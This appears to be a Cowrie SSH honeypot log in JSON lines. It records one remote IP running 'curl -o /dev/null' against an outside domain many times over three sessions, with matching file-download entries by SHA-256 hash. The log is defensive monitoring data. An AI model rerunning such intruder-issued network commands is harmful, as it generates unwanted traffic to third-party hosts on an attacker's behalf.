{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.253869Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.254236Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.280947Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.281754Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.282459Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.285203Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.286175Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.290353Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.294317Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.294872Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.319787Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.321427Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.323871Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.324687Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.326542Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.327252Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.331493Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.333911Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.334538Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.362491Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.364542Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.370519Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.371107Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.373680Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.374880Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.377002Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.377803Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.409203Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.411652Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.414595Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.417042Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.419973Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.421156Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.421849Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.423849Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.424505Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.432496Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.433118Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.461243Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.463294Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.464732Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.465264Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.467863Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.494357Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.498761Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.499420Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.502429Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.530054Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.530779Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.533885Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.536067Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.538414Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.538881Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.562413Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.563181Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.573007Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.575702Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.576567Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.578047Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.578796Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.606111Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.608057Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.610910Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.614162Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.616287Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.617794Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.618311Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.622562Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.623753Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.648257Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.648950Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.655523Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.656411Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.660178Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.661451Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.662124Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.687310Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.689440Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.692630Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.693997Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
